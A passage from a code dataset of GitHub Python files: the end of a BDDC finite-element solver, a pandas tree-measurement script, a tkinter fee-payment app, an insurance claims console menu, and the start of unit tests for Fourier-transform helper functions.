x[0,n2-1];\n y2 = x[1,n2-1];\n x3 = x[0,n3-1];\n y3 = x[1,n3-1];\n if x3<=0.5:\n if y3<=0.5:\n rho=a1;\n else:\n rho=a2;\n else:\n if y3<=0.5:\n rho=a2\n else:\n rho=a1;\n coeff[k]=rho;\n b11 = x2-x1;\n b12 = x3-x1;\n b21 = y2-y1;\n b22=y3-y1;\n detb = b11*b22-b12*b21;\n adetb = abs(detb)*rho;\n mydet[k] = adetb\n d11=b22/detb;\n d12 = -b21/detb;\n d21 = -b12/detb;\n d22=b11/detb;\n w1x = -(d11+d12);\n w1y = -(d21+d22);\n w2x = d11;\n w2y = d21;\n w3x = d12;\n w3y = d22;\n aK[n1-1,n1-1] = aK[n1-1,n1-1]+adetb/2*(w1x*w1x+w1y*w1y);\n aK[n1-1,n2-1] = aK[n1-1,n2-1]+adetb/2*(w1x*w2x+w1y*w2y);\n aK[n1-1,n3-1] = aK[n1-1,n3-1]+adetb/2*(w1x*w3x+w1y*w3y);\n aK[n2-1,n1-1] = aK[n2-1,n1-1]+adetb/2*(w2x*w1x+w2y*w1y);\n aK[n2-1,n2-1] = aK[n2-1,n2-1]+adetb/2*(w2x*w2x+w2y*w2y);\n aK[n2-1,n3-1] = aK[n2-1,n3-1]+adetb/2*(w2x*w3x+w2y*w3y);\n aK[n3-1,n1-1] = aK[n3-1,n1-1]+adetb/2*(w3x*w1x+w3y*w1y);\n aK[n3-1,n2-1] = aK[n3-1,n2-1]+adetb/2*(w3x*w2x+w3y*w2y);\n aK[n3-1,n3-1] = aK[n3-1,n3-1]+adetb/2*(w3x*w3x+w3y*w3y);\n ointx = x1+b11*intx+b12*inty;\n ointy = y1+b21*intx+b22*inty;\n int1 = 0;\n int2 = 0;\n int3=0;\n for i in range(7):\n xxx=ointx[i];\n yyy = ointy[i];\n ff = 2*np.sin(xxx*pi)*pi*pi*np.sin(yyy*pi);\n int1 =int1+ff*(1-intx[i]-inty[i])*intw[i];\n int2 = int2+ff*(intx[i])*intw[i];\n int3 = int3+ff*(inty[i])*intw[i];\n b[n1-1]= b[n1-1]+adetb*int1;\n b[n2-1]= b[n2-1]+adetb*int2;\n b[n3-1]= b[n3-1]+adetb*int3;\n \n domain_utrue[dindex-1, :]=np.zeros(lnv);\n for iit in range(lnv):\n xxx=x[0,iit];\n yyy = x[1,iit];\n domain_utrue[dindex-1,iit] = np.sin(xxx*pi)*np.sin(yyy*pi);\n domain_rho[dindex-1]=rho;\n #boundary treatment\n id_list=[];\n if ii==0:\n id_list= np.append(id_list,lijtk[0,:]);\n id_list = list(set(id_list))\n if ii == Nvm-1:\n id_list = np.append(id_list, lijtk[nvm1-1,:]);\n id_list = list(set(id_list))\n if jj ==0:\n id_list = np.append(id_list, lijtk[:,0]);\n id_list = list(set(id_list))\n if jj==Nvn-1:\n id_list = np.append(id_list, lijtk[:, nvn1-1]);\n id_list = list(set(id_list))\n for l in range(len(id_list)):\n aK[int(id_list[l])-1,:]=0\n aK[:,int(id_list[l])-1]=0\n dd= len(id_list);\n #iidd=max(dd, 1);\n for ddd in range(dd):\n iidd=int(id_list[ddd])\n aK[iidd-1, iidd-1]=1;\n b[iidd-1]=0\n domain_K[dindex-1,:, :] = aK;\n \n temp_matrix = np.zeros([ldd.size, lii.size]);\n for m in range(ldd.size):\n for n in range(lii.size):\n temp_matrix[m, n] = aK[int(ldd[m]-1), int(lii[0,n]-1)];\n domain_Kdi[dindex-1, :, :] = temp_matrix;\n \n temp_matrix = np.zeros([lii.size, lii.size]);\n for m in range(lii.size):\n for n in range(lii.size):\n temp_matrix[m, n] = aK[int(lii[0,m]-1), int(lii[0,n]-1)];\n domain_KiiR[dindex-1,:,:] = scipy.linalg.cholesky(temp_matrix);\n \n temp_matrix = np.zeros([lrr.size, lrr.size]);\n for m in range(lrr.size):\n for n in range(lrr.size):\n temp_matrix[m, n] = aK[int(lrr[m]-1), int(lrr[n]-1)];\n domain_KrrR[dindex-1, :, :] = scipy.linalg.cholesky(temp_matrix);\n \n temp_matrix = np.zeros([lcc.size, lii.size]);\n for m in range(lcc.size):\n for n in range(lii.size):\n temp_matrix[m, n] = aK[int(lcc[m]-1), int(lii[0,n]-1)];\n domain_Kci[dindex-1, :,:] = temp_matrix;\n \n temp_matrix = np.zeros([lcc.size, lcc.size]);\n for m in range(lcc.size):\n for n in range(lcc.size):\n temp_matrix[m, n] = aK[int(lcc[m]-1), int(lcc[n]-1)];\n domain_Kcc[dindex-1, :,:] = temp_matrix;\n \n temp_matrix = np.zeros([lrr.size, lcc.size]);\n for m in range(lrr.size):\n for n in range(lcc.size):\n temp_matrix[m, n] = aK[int(lrr[m]-1), int(lcc[n]-1)];\n domain_Krc[dindex-1, :,:] = temp_matrix;\n \n temp_matrix = np.zeros([ldd.size]);\n for m in range(ldd.size):\n temp_matrix[m] = b[int(ldd[m]-1)];\n domain_fd[dindex-1, :] = temp_matrix;\n \n temp_matrix = np.zeros([lcc.size]);\n for m in range(lcc.size):\n temp_matrix[m] = b[int(lcc[m]-1)];\n domain_fc[dindex-1, :] = temp_matrix;\n \n temp_matrix = np.zeros([lii.size]);\n for m in range(lii.size):\n temp_matrix[m] = b[int(lii[0,m]-1)];\n \n domain_fi[dindex-1, :] = temp_matrix;\n \n temp_matrix = np.zeros([lb.size]);\n for m in range(lb.size):\n temp_matrix[m] = b[int(lb[m]-1)];\n domain_fb[dindex-1, :] = temp_matrix;\n \n domain_u[dindex-1, :] = np.zeros(lnv);\n domain_ff[dindex-1,:] = b;\n \n domain_Bc[dindex-1, :, :] = np.zeros([lnv,nc]);\n domain_D[dindex-1, :, :] = np.zeros([lnv, lnv]);\n domain_B[dindex-1, :, :] = np.zeros([lnv, ng]);\n # first get the matrix B --------------------------\n # I order the Lagrange Multiplier as the order:\n\n\n #--- 3 --- 6 --- 9\n # 11 13 15\n #--- 2 --- 5 --- 8\n # 10 12 14\n #--- 1 --- 4 --- 7\n nr=0;\n ng=0;\n id1=lijtk[nvm1-1,1:nvn].astype('int');\n id2=lijtk[0 ,1:nvn].astype('int');\n for i in range(1, Nvm):\n for j in range(1, Nvn+1):\n domIndexL = (i-1)*Nvn+j-1;\n domIndexR = domIndexL+Nvn;\n for jj in range(1, nvn):\n nr = nr+1;\n ng = ng+1;\n domain_B[domIndexL, int(id1[jj-1]-1), ng-1]=1;\n domain_B[domIndexR, id2[jj-1]-1, ng-1]=1;\n rho1 = domain_rho[domIndexL];\n rho2 = domain_rho[domIndexR];\n rhos = rho1+rho2;\n domain_D[domIndexL, id1[jj-1]-1, id1[jj-1]-1] = rho1/rhos;\n domain_D[domIndexR, id2[jj-1]-1, id2[jj-1]-1] = rho2/rhos;\n \n id1 = lijtk[1:nvm, nvn].astype('int');\n id2 = lijtk[1:nvm, 0].astype('int');\n for i in range(1, Nvm+1):\n for j in range(1, Nvn):\n domIndexD = (i-1)*Nvn+j-1;\n domIndexU = domIndexD+1;\n for ii in range(1, nvm):\n nr=nr+1;\n ng = ng+1;\n domain_B[domIndexD, id1[ii-1]-1, ng-1]=1;\n domain_B[domIndexU, id2[ii-1]-1, ng-1]=1;\n rho1 = domain_rho[domIndexD];\n rho2 = domain_rho[domIndexU];\n rhos = rho1+rho2;\n domain_D[domIndexD, id1[ii-1]-1, id1[ii-1]-1] = rho1/rhos;\n domain_D[domIndexU, id2[ii-1]-1, id2[ii-1]-1] = rho2/rhos;\n \n # for crosspoints\n nc=0;\n # to get a global gijtk\n #Domain number\n # 3|4\n #1|2\n \n id1 = lijtk[nvm1-1, nvn1-1].astype('int');\n id2 = lijtk[0, nvn1-1].astype('int');\n id3= lijtk[nvm1-1, 0].astype('int');\n id4 = lijtk[0, 0].astype('int');\n for i in range(1, Nvm):\n indexi = i*nvm1-1;\n for j in range(1, Nvn):\n indexj = j*nvn1-1;\n domIndex1 = (i-1)*Nvn+j-1;\n domIndex2 = domIndex1+Nvn;\n domIndex3 = domIndex1 +1;\n domIndex4 = domIndex2+1;\n #global id\n #id = ijtk[indexi-1, indexj-1]\n #NCross = [Ncross id];\n #local id\n nc=nc+1\n id=nc;\n ng=ng+1;\n domain_Bc[domIndex1, id1-1, id-1]=1;\n domain_Bc[domIndex2, id2-1, id-1]=1;\n domain_Bc[domIndex3, id3-1, id-1]=1;\n domain_Bc[domIndex4, id4-1, id-1]=1;\n rho1 = domain_rho[domIndex1]\n rho2 = domain_rho[domIndex2]\n rho3 = domain_rho[domIndex3]\n rho4 = domain_rho[domIndex4]\n rhos=rho1+rho2+rho3+rho4;\n domain_D[domIndex1, id1-1, id1-1] = rho1/rhos;\n domain_D[domIndex2, id2-1, id2-1] = rho2/rhos;\n domain_D[domIndex3, id3-1, id3-1] = rho3/rhos;\n domain_D[domIndex4, id4-1, id4-1] = rho4/rhos;\n domain_B[domIndex1, id1-1, ng-1]=1;\n domain_B[domIndex2, id2-1, ng-1]=1;\n domain_B[domIndex3, id3-1, ng-1]=1;\n domain_B[domIndex4, id4-1, ng-1]=1; \n nr1=nr+1;\n \n #begin main part\n \n KccS = np.zeros([nc, nc]);\n dr = np.zeros([ng, 1]);\n ug = np.zeros([ng, 1]);\n lb = lb.astype('int')\n lii = lii.astype('int')\n for i in range(DomNum):\n lfi=np.linalg.solve(domain_KiiR[i, :, :], (np.linalg.solve(domain_KiiR[i,:,:].T, domain_fi[i,:]) ));\n #lii = np.reshape(lii,max(lii.shape) );\n temp_matrix = np.zeros([max(lb.shape),max(lii.shape) ])\n for lbindex in range(max(lb.shape)):\n for liiindex in range(max(lii.shape)):\n temp_matrix[lbindex, liiindex] = domain_K[i, lb[lbindex]-1, lii[0,liiindex]-1]\n \n update = (domain_B[i,lb-1,:].T) @ (domain_fb[i, :]-temp_matrix@lfi)\n update_sz = update.size\n update = np.reshape(update,(update_sz,1))\n dr = dr + update\n lcc =lcc.astype('int');\n temp_matrix = np.linalg.solve(domain_KrrR[i,:,:].T, domain_Krc[i,:,:]);\n \n temp_matrix = np.linalg.solve(domain_KrrR[i, :, :], temp_matrix);\n KccS = KccS+domain_Bc[i, lcc-1, :].T@(domain_Kcc[i]-domain_Krc[i, :, :].T@temp_matrix)@domain_Bc[i, lcc-1, :];\n \n Rc = scipy.linalg.cholesky(KccS);\n #input good up to this point for the below function\n [ug, error, iterate, flag]= cg(ug, dr, max_it, tol)\n #output is good now\n \n for i in range(DomNum):\n for m in range(lb.size):\n domain_u[i, lb[m]-1] = domain_B[i, lb[m]-1, :]@ug;\n [index2] = lb.shape\n [index1] = lii[0, :].shape\n temp4 = np.empty([index1, index2])\n for j in range(index1):\n for k in range(index2):\n temp4[j, k] = domain_K[i, lii[0, j]-1, lb[k]-1]\n ytemp = domain_fi[i,:]-temp4@domain_u[i, lb-1]\n #continue here\n ytemp = np.linalg.solve(domain_KiiR[i, :, :].T, ytemp)\n domain_u[i, lii-1]=np.linalg.solve(domain_KiiR[i, :, :], ytemp)\n resl2 = 0\n errmax = 0\n for i in range(DomNum):\n udiff = domain_utrue[i, :]-domain_u[i,:]\n resl2 = resl2+np.linalg.norm(udiff)**2\n errmax = max(max(abs(udiff)), errmax)\n resl2 = (resl2**.5)/(nvm*Nvm)\n stop = time.time()\n print('Time Elasped:' + str(stop - start))\n print('L2 = ' + str(resl2))\n print('max = '+ str(errmax ))\n \n \n \n \n\n\n \n \n \n \n\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n\n \n \n \n\n\n# In[57]:\n\n\nBDDC(3, 4, 2, 7)\n\n\n# In[58]:\n\n\nA = np.array([[2,2]])\nA=np.reshape(A, 2)\nprint(A)\n\n\n# In[59]:\n\n\nmax(A.shape)\n\n\n# In[60]:\n\n\nA.astype('int')\n\n\n# In[ ]:\n\n\n\n\n\n# In[61]:\n\n\nprint(Nvm)\n\n\n# In[ ]:\n\n\n\n\n\n# In[ ]:\n\n\n\n\n\n# In[ ]:\n\n\n\n\n","repo_name":"Nrdman/BDDC","sub_path":"BDDC_EO.py","file_name":"BDDC_EO.py","file_ext":"py","file_size_in_byte":22480,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"16506764057","text":"import pandas as pd\nimport os\n\ndirectorio = '../Data'\narchivo1 = 'arbolado-publico-lineal-2017-2018.csv'\narchivo2= 'arbolado-en-espacios-verdes.csv'\nfname1 = os.path.join(directorio,archivo1)\nfname2 = os.path.join(directorio,archivo2)\ndf_parques= pd.read_csv(fname1)\ndf_veredas= pd.read_csv(fname2)\ncols_sel1= ['altura_arbol', 'diametro_altura_pecho' , 'nombre_cientifico']\ncols_sel2= ['altura_tot', 'diametro', 'nombre_cie']\ndf_tipas_parques = df_parques[df_parques['nombre_cientifico'] == 'Tipuana tipu'][cols_sel1].copy()\ndf_tipas_veredas = df_veredas[df_veredas['nombre_cie'] == 'Tipuana Tipu'][cols_sel2].copy()\ndf_tipas_veredas.columns=['altura_arbol', 'diametro_altura_pecho', 'nombre_cientifico']\ndf_tipas_parques=df_tipas_parques.assign(ambiente='parque')\ndf_tipas_veredas=df_tipas_veredas.assign(ambiente='vereda')\ndf_tipas = pd.concat([df_tipas_veredas, df_tipas_parques])\n\ndf_tipas.boxplot('diametro_altura_pecho',by = 'ambiente')\n\ndf_tipas.boxplot('altura_arbol',by = 'ambiente')\n\ndef par(n):\n return inpar(n-1)\ndef inpar(n):\n if n ==0:\n return False\n return par(n-1)\n\nprint(inpar(4))\n","repo_name":"CristianAmici/python","sub_path":"clase08/arbolado_parques_veredas.py","file_name":"arbolado_parques_veredas.py","file_ext":"py","file_size_in_byte":1116,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"22264248960","text":"from tkinter import *\r\nimport tkinter as tk\r\nfrom tkinter import ttk\r\n\r\nfrom tuitions import Payment\r\nfrom student import Student\r\n# functions\r\n\r\n\r\n\r\nwindow = Tk()\r\nwindow.title(\"Fees Payment\")\r\n\r\ndef add_fees():\r\n tuition = int(tuition_entry.get())\r\n lib_fee = int(lib_fee_entry.get())\r\n func_fee = int(func_fee_entry.get())\r\n med_fee = int(med_fee_entry.get())\r\n\r\n Payment.set_total_fees(tuition, lib_fee, func_fee,med_fee)\r\n Total_fee_entry.delete(0)\r\n Total_fee_entry.insert(0,string=f\"total_fees is: {Payment.get_total_fees()}\")\r\n\r\nstds = []\r\ndef student_details():\r\n global stds\r\n name = name_entry.get()\r\n age = age_entry.get()\r\n fees = int(fee_paid_entry.get())\r\n std1 = Student(name, age, fees)\r\n\r\n stds = std1.get_all_students()\r\ndef print_students():\r\n output_text.insert(tk.END, 'All the Students: ')\r\n i = 0\r\n for std in stds:\r\n output_text.insert(tk.END, f'\\n\\nStudent {i + 1}')\r\n output_text.insert(tk.END, f'\\n{std}')\r\n i +=1\r\n\r\n output_text.insert(tk.END, '\\nSTUDENTS WHO HAVE PAID: ')\r\n paid = Payment.get_paid_std()\r\n\r\n for pa in paid:\r\n output_text.insert(tk.END, f'\\n{pa}')\r\n\r\n\r\n\r\n# creating labels\r\nsetting_fees_label = ttk.Label(text = \"Setting fees\")\r\nsetting_fees_label.grid(row=0, column=1)\r\n\r\ntuition_label = ttk.Label(text=\"Enter tuition: \")\r\ntuition_label.grid(row=1, column=0)\r\n\r\nmed_fee_label = ttk.Label(text=\"Enter med_fee: \")\r\nmed_fee_label.grid(row=2, column=0)\r\n\r\nlib_fee_label = ttk.Label(text=\"Enter lib_fee:\")\r\nlib_fee_label.grid(row=3, column=0)\r\n\r\nfunc_fee_label = ttk.Label(text=\"Enter func_fee: \")\r\nfunc_fee_label.grid(row=4, column=0)\r\n\r\nTotal_fee_label = ttk.Label(text=\"Total_fee: \")\r\nTotal_fee_label.grid(row=5, column=0)\r\n\r\nfees_paid_label = ttk.Label(text=\"Fees_paid: \")\r\nfees_paid_label.grid(row=7, column=0)\r\n\r\nname_label = ttk.Label(text=\"Enter student name: \")\r\nname_label.grid(row=9, column=0)\r\n\r\nage_label = ttk.Label(text=\"Enter student age: \")\r\nage_label.grid (row=10, column=0)\r\n\r\n#fee_label = ttk.Label(text=\"Enter fees paid: \")\r\n#fee_label.grid(row=11, column=0)\r\n\r\n\r\n\r\n\r\n# setting entry\r\ntuition_entry = Entry(width=30)\r\ntuition_entry.grid(row=1, column=1)\r\ntuition_entry.focus()\r\n\r\nmed_fee_entry = Entry(width=30)\r\nmed_fee_entry.grid(row=2, column=1)\r\n\r\n\r\nlib_fee_entry = Entry(width=30)\r\nlib_fee_entry.grid(row=3, column=1)\r\n\r\n\r\nfunc_fee_entry = Entry(width=30)\r\nfunc_fee_entry.grid(row=4, column=1)\r\n\r\nTotal_fee_entry = Entry(width=25)\r\nTotal_fee_entry.grid(row=5, column=1)\r\n\r\nfee_paid_entry = Entry(width=20)\r\nfee_paid_entry.grid(row=7, column=1)\r\n\r\nname_entry = Entry(width=30)\r\nname_entry.grid(row=9, column=1)\r\n\r\nage_entry = Entry(width=15)\r\nage_entry.grid(row=10, column=1)\r\n\r\n#fee_paid_entry = Entry(width=20)\r\n#fee_paid_entry.grid(row=11, column=1)\r\n\r\n\r\n\r\n# creating button\r\ntotal_fee_button = Button(text=\"add_fees\", command=add_fees)\r\ntotal_fee_button.grid(row=6, column=1)\r\n\r\n\r\n\r\nrecord_student_label = ttk.Label(text=\"\\nDO YOU WANT TO ADD MORE STUDENTS:\")\r\nrecord_student_label.grid(row=12, column=1)\r\nrecord_student_button = ttk.Button( text='YES', command=student_details)\r\nrecord_student_button.grid(row=12, column=2)\r\n\r\nno_more_student_label = ttk.Label(text=\"\\nDO YOU WANT TO RECORD THIS STUDENT:\")\r\nno_more_student_label.grid(row=13, column=1)\r\nno_more_student_button = ttk.Button(text='NO', command=print_students)\r\nno_more_student_button.grid(row=13, column=2)\r\n\r\nprint_button = ttk.Button(text='\\nPrint Students', command=print_students)\r\nprint_button.grid(row=14, column=2)\r\n\r\noutput_text = Text()\r\noutput_text.grid(row=15, column=2)\r\n\r\n\r\n\r\n\r\nwindow.mainloop()","repo_name":"OgwangOsbornmark/osborn-tkinter","sub_path":"TK TEST/PAYMENT.PY","file_name":"PAYMENT.PY","file_ext":"py","file_size_in_byte":3631,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"6356942031","text":"\nimport repo\n\nwhile True:\n print(\"Komodo Claims Department\")\n user_input = input('Choose an item from the menu: \\n'\n '1. See all claims. \\n'\n '2. Enter new claim. \\n'\n '3. Take care of next claim. \\n'\n '4. Exit. \\n')\n\n if user_input == '1':\n claims_list = repo.RepoFunctions()\n claims_list.see_claims()\n print('Claim id\\t\\tType\\t\\tDescription\\t\\tAmount\\t\\tDate of Incident\\t\\tDate of Claim\\t\\tIs Valid')\n for ind_claims in repo.claims:\n print(f'{ind_claims.claim_id}\\t\\t\\t{ind_claims.claim_type}\\t\\t{ind_claims.description}\\t\\t{ind_claims.claim_amount}\\t\\t{ind_claims.date_of_incident}\\t\\t\\t{ind_claims.date_of_claim}\\t\\t\\t\\t{ind_claims.is_valid}')\n\n if user_input == '2':\n claim_id = input(\"What is the claim id: \\n\")\n claim_type = input(\"What is type of claim is it: \\n\")\n description = input(\"Describe the claim: \\n\")\n claim_amount = input(\"What is the claim amount: \\n\")\n date_of_incident = input(\n \"When did the incident happen:(mm/dd/yyyy) \\n\")\n date_of_claim = input(\"When was the claim issued: (mm/dd/yyyy) \\n\")\n is_valid = input(\"Is the claim valid: \\n\")\n new_claim = repo.RepoFunctions()\n new_claim.add_claim(claim_id, claim_type, description,\n claim_amount, date_of_incident, date_of_claim, is_valid)\n if user_input == '3':\n next_claim = repo.claims[0]\n print(\"Here are the claim details for the next claim:\")\n print(f'Claim ID: {next_claim.claim_id}')\n print(f'Claim Type: {next_claim.claim_type}')\n print(f'Description: {next_claim.description}')\n print(f'Claim Amount: {next_claim.claim_amount}')\n print(f'Date of Incident: {next_claim.date_of_incident}')\n print(f'Date of Claim: {next_claim.date_of_claim}')\n print(f'Is Valid: {next_claim.is_valid}')\n y_or_n = input('Do you want to deal with this claim now(y/n)?')\n if y_or_n == 'y':\n y_option = repo.RepoFunctions()\n y_option.take_next_claim()\n elif y_or_n == 'n':\n pass\n if user_input == '4':\n exit()\n","repo_name":"PRMcgill/Gold_Challenges","sub_path":"challenge_2/komodo_ui.py","file_name":"komodo_ui.py","file_ext":"py","file_size_in_byte":2239,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"34991206588","text":"\"\"\"\nUnit tests for fourier_algorithm.py functions\n\"\"\"\n\nimport itertools\n\nimport dask\nimport numpy\nimport pytest\n\nfrom ska_sdp_exec_swiftly.fourier_transform.algorithm_parameters import (\n BaseArrays,\n)\nfrom ska_sdp_exec_swiftly.fourier_transform.fourier_algorithm import (\n broadcast,\n coordinates,\n create_slice,\n extract_mid,\n fft,\n ifft,\n ith_subgrid_facet_element,\n make_facet_from_sources,\n make_subgrid_and_facet_from_sources,\n make_subgrid_from_sources,\n pad_mid,\n roll_and_extract_mid,\n roll_and_extract_mid_axis,\n)\n\n\ndef test_pad_mid_1d():\n \"\"\"\n perform operation on 1D array\n\n 1 1 1 --> 0 1 1 1 0\n \"\"\"\n array = numpy.ones(3)\n desired_size = 5\n result = pad_mid(array, desired_size, axis=0)\n\n assert (result == numpy.array([0, 1, 1, 1, 0])).all()\n\n\ndef test_pad_mid_2d_axis0():\n \"\"\"\n perform operation for axis=0\n\n 0 0 0\n 1 1 1 1 1 1\n 1 1 1 --> 1 1 1\n 1 1 1 1 1 1\n 0 0 0\n \"\"\"\n array = numpy.ones((3, 3))\n desired_size = 5\n expected_array = numpy.array(\n [[0, 0, 0], [1, 1, 1], [1, 1, 1], [1, 1, 1], [0, 0, 0]]\n )\n result = pad_mid(array, desired_size, axis=0)\n\n assert (result == expected_array).all()\n\n\ndef test_pad_mid_2d_axis1():\n \"\"\"\n perform operation for axis=1\n\n 1 1 1 0 1 1 1 0\n 1 1 1 --> 0 1 1 1 0\n 1 1 1 0 1 1 1 0\n \"\"\"\n array = numpy.ones((3, 3))\n desired_size = 5\n expected_array = numpy.array(\n [\n [0, 1, 1, 1, 0],\n [0, 1, 1, 1, 0],\n [0, 1, 1, 1, 0],\n ]\n )\n result = pad_mid(array, desired_size, axis=1)\n\n assert (result == expected_array).all()\n\n\ndef test_pad_mid_2d_axis01():\n \"\"\"\n perform operation for axis=0 and axis=1\n\n 0 0 0 0 0\n 1 1 1 0 1 1 1 0\n 1 1 1 --> 0 1 1 1 0\n 1 1 1 0 1 1 1 0\n 0 0 0 0 0\n \"\"\"\n array = numpy.ones((3, 3))\n desired_size = 5\n expected_array = numpy.array(\n [\n [0, 0, 0, 0, 0],\n [0, 1, 1, 1, 0],\n [0, 1, 1, 1, 0],\n [0, 1, 1, 1, 0],\n [0, 0, 0, 0, 0],\n ]\n )\n first_pad = pad_mid(array, desired_size, axis=0)\n result = pad_mid(first_pad, desired_size, axis=1)\n\n assert (result == expected_array).all()\n\n\ndef test_extract_mid_1d():\n \"\"\"\n perform operation on 1D array\n\n if new size can be evenly extracted from original size:\n 7 -> 5\n x y y y y y x --> y y y y y\n\n if new size doesn't allow for even extraction from the middle,\n then the middle is extracted plus the one element just before the middle\n 7 -> 4\n x x y y y x x --> x y y y\n \"\"\"\n full_array = numpy.array([0, 1, 2, 3, 4, 5, 6])\n desired_size = 5\n result = extract_mid(full_array, desired_size, axis=0)\n\n assert (result == numpy.array([1, 2, 3, 4, 5])).all()\n\n desired_size = 4\n result = extract_mid(full_array, desired_size, axis=0)\n\n assert (result == numpy.array([1, 2, 3, 4])).all()\n\n\ndef test_extract_mid_2d_axis0():\n \"\"\"\n perform operation for axis=0\n\n if new size can be evenly extracted from original size:\n 3 -> 1\n x x x x\n x y y x --> x y y x\n x x x x\n\n if new size doesn't allow for even extraction from the middle,\n then the middle is extracted plus the one element just BEFORE the middle\n (AXIS=0 only)\n 3 -> 2\n x x x x x x x x\n x y y x --> x y y x\n x x x x\n \"\"\"\n full_array = numpy.array([[0, 1, 2, 3], [4, 5, 6, 7], [8, 9, 10, 11]])\n desired_size = 1\n expected_array = numpy.array([[4, 5, 6, 7]])\n result = extract_mid(full_array, desired_size, axis=0)\n assert (result == expected_array).all()\n\n desired_size = 2\n expected_array = numpy.array([[0, 1, 2, 3], [4, 5, 6, 7]])\n result = extract_mid(full_array, desired_size, axis=0)\n\n assert (result == expected_array).all()\n\n\ndef test_extract_mid_2d_axis1():\n \"\"\"\n perform operation for axis=1\n\n if new size can be evenly extracted from original size:\n 4 -> 2\n x x x x x x\n x y y x --> y y\n x x x x x x\n\n if new size doesn't allow for even extraction from the middle,\n then the middle is extracted plus the one element just AFTER the middle\n (AXIS=1 only)\n 4 -> 3\n x x x x x x x\n x y y x --> y y x\n x x x x x x x\n \"\"\"\n full_array = numpy.array([[0, 1, 2, 3], [4, 5, 6, 7], [8, 9, 10, 11]])\n desired_size = 2\n expected_array = numpy.array([[1, 2], [5, 6], [9, 10]])\n result = extract_mid(full_array, desired_size, axis=1)\n\n assert (result == expected_array).all()\n\n desired_size = 3\n expected_array = numpy.array([[1, 2, 3], [5, 6, 7], [9, 10, 11]])\n result = extract_mid(full_array, desired_size, axis=1)\n\n assert (result == expected_array).all()\n\n\ndef test_extract_mid_2d_axis01():\n \"\"\"\n perform operation for axis=0 and axis=1\n\n square matrix (input and output too):\n 5x5 -> 3x3\n x x x x x\n x y y y x y y y\n x y y y x --> y y y\n x y y y x y y y\n x x x x x\n\n\n 5x5 -> 3x2\n x x x x x\n x y y z x y y\n x y y z x --> y y\n x y y z x y y\n x x x x x\n \"\"\"\n full_array = numpy.array(\n [\n [0, 1, 2, 3, 4],\n [5, 6, 7, 8, 9],\n [10, 11, 12, 13, 14],\n [15, 16, 17, 18, 19],\n [20, 21, 22, 23, 24],\n ]\n )\n desired_size = 3\n expected_array = numpy.array([[6, 7, 8], [11, 12, 13], [16, 17, 18]])\n result = extract_mid(\n extract_mid(full_array, desired_size, axis=0), desired_size, axis=1\n )\n\n assert (result == expected_array).all()\n\n desired_size_axis0 = 3\n desired_size_axis1 = 2\n expected_array = numpy.array([[6, 7], [11, 12], [16, 17]])\n result = extract_mid(\n extract_mid(full_array, desired_size_axis0, axis=0),\n desired_size_axis1,\n axis=1,\n )\n\n assert (result == expected_array).all()\n\n\ndef test_fft_1d():\n \"\"\"\n FFT of a 1D array (== axis=0)\n\n input array: --> fft (complex):\n 1 1 1 1 1 0 0 5 0 0\n \"\"\"\n array = numpy.ones(5)\n result = fft(array, axis=0)\n assert result.dtype == complex\n assert (result == numpy.array([0, 0, 5, 0, 0], dtype=complex)).all()\n\n\ndef test_fft_2d_axis0():\n \"\"\"\n FFt along axis=0\n\n input array: --> fft (complex):\n 1 1 1 1 1 0 0 0 0 0\n 1 1 1 1 1 3 3 3 3 3\n 1 1 1 1 1 0 0 0 0 0\n \"\"\"\n array = numpy.ones((3, 5))\n result = fft(array, axis=0)\n assert result.dtype == complex\n assert (\n result[numpy.where(result != 0)]\n == numpy.array([3, 3, 3, 3, 3], dtype=complex)\n ).all()\n\n\ndef test_fft_2d_axis1():\n \"\"\"\n FFT along axis=1\n\n input array: --> fft (complex):\n 1 1 1 1 1 0 0 5 0 0\n 1 1 1 1 1 0 0 5 0 0\n 1 1 1 1 1 0 0 5 0 0\n \"\"\"\n array = numpy.ones((3, 5))\n result = fft(array, axis=1)\n assert result.dtype == complex\n assert (\n result[numpy.where(result != 0)]\n == numpy.array([[5], [5], [5]], dtype=complex)\n ).all()\n\n\ndef test_fft_2d_axis01():\n \"\"\"\n FFT along axis=0 and axis=1\n\n input array: --> fft (complex):\n 1 1 1 1 1 0 0 0 0 0\n 1 1 1 1 1 0 0 15 0 0\n 1 1 1 1 1 0 0 0 0 0\n \"\"\"\n array = numpy.ones((3, 5))\n result = fft(fft(array, axis=0), axis=1)\n assert result.dtype == complex\n assert (\n result[numpy.where(result != 0)] == numpy.array([15], dtype=complex)\n ).all()\n\n\ndef test_ifft_1d():\n \"\"\"\n iFFT of a 1D array (== axis=0)\n \"\"\"\n result = ifft(numpy.array([0, 0, 5, 0, 0], dtype=complex), axis=0)\n assert (result == numpy.ones(5)).all()\n\n\ndef test_ifft_2d_axis0():\n \"\"\"\n iFFT along axis=0\n \"\"\"\n array = numpy.array(\n [\n [0, 0, 0, 0, 0],\n [0, 0, 15, 0, 0],\n [0, 0, 0, 0, 0],\n ],\n dtype=complex,\n )\n\n result = ifft(array, axis=0)\n\n assert (\n result\n == numpy.array([[0, 0, 5, 0, 0], [0, 0, 5, 0, 0], [0, 0, 5, 0, 0]])\n ).all()\n\n\ndef test_ifft_2d_axis1():\n \"\"\"\n iFFT along axis=1\n \"\"\"\n array = numpy.array(\n [\n [0, 0, 0, 0, 0],\n [0, 0, 15, 0, 0],\n [0, 0, 0, 0, 0],\n ],\n dtype=complex,\n )\n\n result = ifft(array, axis=1)\n\n assert (\n result\n == numpy.array([[0, 0, 0, 0, 0], [3, 3, 3, 3, 3], [0, 0, 0, 0, 0]])\n ).all()\n\n\ndef test_ifft_2d_axis01():\n \"\"\"\n iFFT along axis=0 and axis=1\n \"\"\"\n array = numpy.array(\n [\n [0, 0, 0, 0, 0],\n [0, 0, 15, 0, 0],\n [0, 0, 0, 0, 0],\n ],\n dtype=complex,\n )\n result = ifft(ifft(array, axis=0), axis=1)\n\n assert (result == numpy.ones((3, 5))).all()\n\n\n@pytest.mark.parametrize(\n \"n, minimum, maximum\",\n [\n (8, -0.5, 0.375),\n (10, -0.5, 0.4),\n (23, -0.47826087, 0.47826087),\n (50, -0.5, 0.48),\n (100, -0.5, 0.49),\n (1000, -0.5, 